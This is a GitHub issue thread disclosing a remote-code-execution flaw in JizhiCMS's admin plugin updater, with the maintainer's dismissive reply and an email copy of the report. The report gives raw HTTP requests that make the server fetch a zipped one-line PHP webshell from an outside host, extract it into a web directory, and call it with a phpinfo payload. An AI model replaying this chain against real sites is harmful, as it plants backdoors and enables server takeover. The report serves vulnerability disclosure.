### ISSUE TITLE
后台 插件管理存在命令执行漏洞

### ISSUE THREAD

**Issue by azraelxuemo** [Cherry-toto/jizhicms#84]
首先这里我使用的最新版本的cms
![image](https://user-images.githubusercontent.com/60163868/206654249-29b62e99-6284-4adb-b33b-a8867b4a5054.png)
然后这里我先利用PluginsController.php里的update函数进行操作，首先我们创建一个木马压缩包,比较简单的一句话木马
![image](https://user-images.githubusercontent.com/60163868/206654441-ae72f282-e4f7-4b43-8c14-9b00f916a0ef.png)
进行压缩，并开启http服务提供下载
![image](https://user-images.githubusercontent.com/60163868/206654581-ab1676be-04bb-4555-8643-dc5c157e0c7c.png)
利用start-download功能进行下载
```
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 192.168.1.132
Content-Length: 90
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.132
Referer: http://192.168.1.132/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1667813816; _ga=GA1.1.285813930.1667823442; PHPSESSID=45ilp4m5f6r71r2bktathd9prb
Connection: close
```

action=start-download&filepath=apidata&download_url=http://42.193.6.219:10001/apidata.zip?
![image](https://user-images.githubusercontent.com/60163868/206654667-52db0b69-03b8-43ae-ac24-7a0573e24e6c.png)
然后我们利用解压功能
```
POST /index.php/admins/Plugins/update.html HTTP/1.1
Host: 192.168.1.132
Content-Length: 34
Accept: application/json, text/javascript, */*; q=0.01
X-Requested-With: XMLHttpRequest
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
Content-Type: application/x-www-form-urlencoded; charset=UTF-8
Origin: http://192.168.1.132
Referer: http://192.168.1.132/index.php/admins/Plugins/index.html
Accept-Encoding: gzip, deflate
Accept-Language: zh-CN,zh;q=0.9
Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1667813816; _ga=GA1.1.285813930.1667823442; PHPSESSID=45ilp4m5f6r71r2bktathd9prb
Connection: close
```

action=file-upzip&filepath=apidata
下面这个get_zip_originalsize会进行解压操作
![image](https://user-images.githubusercontent.com/60163868/206654805-de0f0b67-8ba0-4664-b3a2-182a19e30afd.png)
并且会把我们的木马写到这里去
![image](https://user-images.githubusercontent.com/60163868/206654874-64c45926-3669-4a65-8cf2-9fa3d9a407b0.png)
下面访问木马http://192.168.1.132/app/admin/exts/apidata/test.php?1=phpinfo();
![image](https://user-images.githubusercontent.com/60163868/206655104-f2203bde-65e3-48c8-9542-0f4f34033769.png)
![image](https://user-images.githubusercontent.com/60163868/206655161-087887a1-831f-44c4-8375-d88ef94c98ac.png)

修复建议:
在这里我看到网站提供了下载和解压功能，所以我建议还是不要让用户控制下载的url一遍下载到危险的内容，同时建议可以打开web沙箱进行操作
最近php网站容易出现这种解压带来的问题，所以还是把url写死比较好

**Comment by Cherry-toto** [comment]
直接把插件列表权限给收回就行了，你这个并不是问题。我要做的是让团队或者个人也能建立自己的插件库，比如：你可以把自己二开的插件存储到特定的接口下面，你可以把你所有的插件通过接口分享给你自己的客户，而不是所有人。你可以通过付费的方式出售自己的插件接口。你可以专门给特定的人群使用，而不是手动去安装插件。接口可以很方便的把插件下载下来，并安装进系统。


你如果觉得有安全问题，请把插件列表权限关闭。







&nbsp;




------------------&nbsp;原始邮件&nbsp;------------------
发件人:                                                                                                                        "Cherry-toto/jizhicms"                                                                                    ***@***.***&gt;;
发送时间:&nbsp;2022年12月9日(星期五) 下午4:11
***@***.***&gt;;
***@***.***&gt;;
主题:&nbsp;[Cherry-toto/jizhicms] 后台 插件管理存在命令执行漏洞 (Issue #84)





 
首先这里我使用的最新版本的cms
 
 然后这里我先利用PluginsController.php里的update函数进行操作，首先我们创建一个木马压缩包,比较简单的一句话木马
 
 进行压缩，并开启http服务提供下载
 
 利用start-download功能进行下载
 POST /index.php/admins/Plugins/update.html HTTP/1.1 Host: 192.168.1.132 Content-Length: 90 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.132 Referer: http://192.168.1.132/index.php/admins/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1667813816; _ga=GA1.1.285813930.1667823442; PHPSESSID=45ilp4m5f6r71r2bktathd9prb Connection: close  
action=start-download&amp;filepath=apidata&amp;download_url=http://42.193.6.219:10001/apidata.zip?
 
 然后我们利用解压功能
 POST /index.php/admins/Plugins/update.html HTTP/1.1 Host: 192.168.1.132 Content-Length: 34 Accept: application/json, text/javascript, */*; q=0.01 X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.132 Referer: http://192.168.1.132/index.php/admins/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: Hm_lvt_8b02a318fde5831da10426656a43d03c=1667813816; _ga=GA1.1.285813930.1667823442; PHPSESSID=45ilp4m5f6r71r2bktathd9prb Connection: close  
action=file-upzip&amp;filepath=apidata
 下面这个get_zip_originalsize会进行解压操作
 
 并且会把我们的木马写到这里去
 
 下面访问木马http://192.168.1.132/app/admin/exts/apidata/test.php?1=phpinfo();
 
 
 
修复建议:
 在这里我看到网站提供了下载和解压功能，所以我建议还是不要让用户控制下载的url一遍下载到危险的内容，同时建议可以打开web沙箱进行操作
 最近php网站容易出现这种解压带来的问题，所以还是把url写死比较好
